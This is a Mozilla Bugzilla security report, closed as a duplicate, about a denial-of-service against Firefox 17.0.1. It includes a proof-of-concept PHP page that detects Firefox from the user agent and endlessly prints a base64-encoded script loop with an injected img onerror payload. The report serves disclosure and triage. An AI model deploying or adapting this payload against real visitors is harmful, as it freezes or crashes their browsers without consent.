Closed
Bug 822688
Opened 12 years ago
Closed 12 years ago
HTML/JS DOS Vulnerability
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 822264
People
(Reporter: curtisk, Unassigned)
Details
Reported to sec@ ==========//========== Mozilla Firefox HTML/JS DOS Vulnerability Title : Mozilla Firefox HTML/JS DOS Vulnerability Version : Mozilla Firefox Beta Version and Normal 17.0.1 Tested : windows XP SP3 & Windows 7 SP1 Proof Of Concept Code : <!DOCTYPE html> <html> <body> <?php /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Shubham Raj Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/ $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0Z SAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29 iYXInKTt9PC9zY3JpcHQ+'; //check if victim is Using Mozilla Firefox $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false; if ($firefox) { //loop forever while(1) { //print exploit code infinite times. print(base64_decode($exploit)); } } ?> </body> </html>
Comment 1•12 years ago
|
||
Seems remarkably similar to bug 822264. What's the difference, other than the name in the comment?
Reporter | ||
Comment 2•12 years ago
|
||
(In reply to Robert Longson from comment #1) > Seems remarkably similar to bug 822264. What's the difference, other than > the name in the comment? You are correct, there must be a site that has these they are being copied from. Or a group of people is trying to get the same work in by different reporters. Thanks for the catch, I will dupe this against the other bug.
Status: NEW → RESOLVED
Closed: 12 years ago
Flags: sec-bounty-
Resolution: --- → DUPLICATE
Updated•9 years ago
|
Group: core-security → core-security-release
Updated•8 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•